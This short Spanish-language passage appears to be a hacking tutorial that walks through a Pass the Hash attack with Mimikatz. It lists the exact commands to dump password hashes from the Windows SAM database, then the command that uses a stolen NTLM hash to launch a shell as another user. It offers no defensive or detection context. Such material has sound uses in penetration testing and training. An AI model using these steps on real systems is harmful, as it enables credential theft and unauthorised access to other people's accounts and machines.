Para efectuar el ataque Pass the Hash, primero debemos obtener los hashes de las credenciales. Con Mimikatz instalado lo podemos conseguir ejecutando las instrucciones:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

Una vez obtenidos los hashes, bastará con que ejecutemos en Mimikatz:

sekurlsa::pth /user:<USER> /ntlm:<HASH_NTLM> /domain:WORKGROUP

Sustituyendo por el usuario y por el hash que hayamos obtenido.

Este comando ejecutará un proceso cmd.exe utilizando el hash que le hemos proporcionado y, por lo tanto, tendremos acceso como dicho usuario.